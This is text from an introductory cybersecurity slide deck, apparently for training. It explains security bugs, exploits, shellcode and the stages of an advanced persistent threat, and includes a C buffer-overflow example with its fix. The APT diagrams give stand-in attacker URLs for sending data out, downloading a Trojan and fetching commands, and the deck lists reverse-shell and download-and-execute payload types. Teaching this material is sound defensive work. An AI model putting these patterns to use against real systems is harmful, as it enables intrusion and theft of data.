Cyber attacks 101

Rafel Ivgi, Defensia

What is a Software bug?

• A software bug is an error, flaw, mistake, failure, or fault in a computer program.
• A bug produces an incorrect or unexpected result, or causes the program to behave in unintended ways.
• Most bugs arise from mistakes and errors made by people in either a program's source code or its design.

What is a Security bug?

• A security bug or security defect is a software bug that benefits someone other than the intended beneficiaries in the intended ways.
• Security bugs introduce security vulnerabilities by compromising one or more of:
  – Authentication of users and other entities
  – Authorization of access rights and privileges
  – Data confidentiality
  – Data integrity
• Security bugs generally fall into a fairly small number of broad categories that include:
  – Memory safety (e.g. buffer overflow and dangling pointer bugs)
  – Race conditions
  – Secure input and output handling
  – Faulty use of an API
  – Improper use case handling
  – Improper exception handling

How does a security bug look?
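The original slide is a code screenshot that did not survive extraction. As an added example (not the deck's own code), the C below shows the first category listed above, a memory-safety bug: a fixed-size name buffer filled with strcpy() and no bounds check, beside the fixed version that measures the input without over-reading and rejects anything that does not fit. NAME_LEN, copy_name_vulnerable and copy_name_fixed are names assumed for this illustration.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16   /* size of the fixed stack buffer (assumed for this example) */

/* 'Before': the vulnerable form. strcpy() stops only at the NUL terminator of src,
 * so any name of NAME_LEN bytes or more writes past the end of dst and corrupts
 * whatever sits next to it on the stack (other locals, saved registers). */
void copy_name_vulnerable(char dst[NAME_LEN], const char *src)
{
    strcpy(dst, src);
}

/* 'After': the fixed form. The length is measured without reading past
 * NAME_LEN bytes, and oversize input is rejected rather than truncated
 * silently. Returns 0 on success, -1 if src plus its terminator does not fit. */
int copy_name_fixed(char dst[NAME_LEN], const char *src)
{
    size_t n = 0;
    while (n < NAME_LEN && src[n] != '\0')
        n++;
    if (n >= NAME_LEN) {
        dst[0] = '\0';            /* leave the buffer in a defined, safe state */
        return -1;
    }
    memcpy(dst, src, n + 1);      /* n + 1 copies the terminator too */
    return 0;
}

/* Constructed inputs: one fits, one is the oversize case the check must catch.
 * Returns 1 when the fixed copy accepts the first and rejects the second. */
int demo(void)
{
    char buf[NAME_LEN];
    int rc_ok  = copy_name_fixed(buf, "alice");
    int rc_bad = copy_name_fixed(buf, "this-name-is-longer-than-sixteen-bytes");
    return rc_ok == 0 && rc_bad == -1 && buf[0] == '\0';
}

int main(void)
{
    printf("fixed copy accepts short and rejects oversize input: %s\n",
           demo() ? "yes" : "no");
    return 0;
}
```

The boundary case matters: a 15-byte name plus its terminator fills the buffer exactly and is accepted, while a 16-byte name is the first input that would have overflowed and is refused.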

How do hackers find security bugs?

• Reversing software code to read it in assembly, or fuzzing software
  – Discovering 0-day bugs/vulnerabilities (only they have it)
• Reversing security updates (bin-diff)
  – Discovering 1-day bugs/vulnerabilities (they become the first to be able to exploit the vulnerability)

The same Windows code: before vs. after the security patch

What is a Computer/Cyber Exploit?

• A digital weapon
• A small piece of code that activates a bug in software
• Once the bug is activated, a small piece of processor code (assembly code) runs, also known as shell-code
• Shell-code usually downloads a Trojan, adds a local admin user, or connects a cmd.exe back to the attacker

How does exploit code look?

What is a Shell Code?

• A small piece of code used as the payload in the exploitation of a software vulnerability
• It is called "shellcode" because it typically starts a command shell (cmd.exe, /bin/sh) from which the attacker can control the compromised machine
• Any piece of code that performs a similar task can be called shellcode, because the function of a payload is not limited to merely spawning a shell
• Shellcode is commonly written in machine code (assembly)

How does a shellcode look?

What are the common shellcodes?

• Bind Shell
• Reverse Shell
• Download & Execute
• Listen to VNC
• Reverse VNC Connection
• The latest: Download & LoadLibrary

What is a Cyber Attack? (Usage of Cyber Exploits)

• Physical Attack
• Local Network Attack
• Bridged/Routed Network Attack
• Remote Attack

What is an APT (Advanced Persistent Threat)?

• APT usually refers to a group, such as a foreign government, with both the capability and the intent to persistently and effectively target a specific entity.
• The term is commonly used to refer to cyber threats, in particular that of Internet-enabled espionage using a variety of intelligence gathering techniques to access sensitive information.
• Recognized attack vectors include infected media, supply chain compromise, and social engineering.

Individuals

Any Attack vs. an APT

• Regular/Random/Opportunistic/Targeted Cyber Attack
  – Widespread (spam email etc.)
  – Can be anyone (kid, basic cyber criminal, IP scanning robot etc.)
  – One- or two-time attack/attempts
• APT – Advanced Persistent Threat
  – Top-of-the-line / world-class hacking exploits & tools
  – Government or organized crime
  – The target is attacked for at least 2-3 years
  – If caught and cleaned, will usually attack again with a different “face” and tools

APT - How Does It Work?

The slide is a flow diagram of five stages; the diagram's annotation for each stage follows it:

• Penetration: file or link coming from email, Facebook, LinkedIn, tactical Wi-Fi
• Spreading: network exploits, USB, shared drives, internal emails
• Aggregating data & identifying exit routes: try https://home.com/, udp://home.com/, icmp://home.com/, dns://home.com/
• Sending data out covertly: POST https://home.com/report?id=100
• Maintaining remote access OR self-destruct: update Trojans, exploits, bypass techniques

Penetration: 0-Day Usage Statistics

Penetration

Penetration: How Does It Work?

The slide is a flow diagram of five steps; the diagram's annotation for each step follows it:

• Research how to approach the target: email, Facebook, LinkedIn, tactical Wi-Fi
• Deliver custom made content to target: file, web link, SMS/email
• Target opens content and downloads Trojan: https://home.com/trojan.exe
• Trojan calls home and downloads commands: https://home.com/get_cmds?id=100
• Data retrieved & analyzed: decrypt, unzip, database, archive

Research How To Approach The Target


Deliver Custom Made Content To Target - Untraceable Spoofed SMS Sender

Deliver Custom Made Content To Target - Untraceable Spoofed Email Sender


How Does It Work? (Zoom-In)

• Attacker discovers exploit
• Attacker delivers the attack code to the target (email attachment, link)
• Victim opens the attacking content
• Victim's application executes code (Word, Adobe, Flash, IE)
• Attacking code (shellcode) uses an exploitation technique
• Malicious code executes and Trojan installed

Target Opens Content And Downloads Trojan

Target Opens Content And Downloads Trojan – Closing Adobe, Shell-code Executes (calc “plays” the invisible Trojan)

How Do Top Professionals Do It?


Trojan Calls Home And Downloads Commands


Data Retrieved & Analyzed

Spreading - How Does It Work?

Spreading – Network Exploits

Spreading – Network Shares

Spreading – USB Drives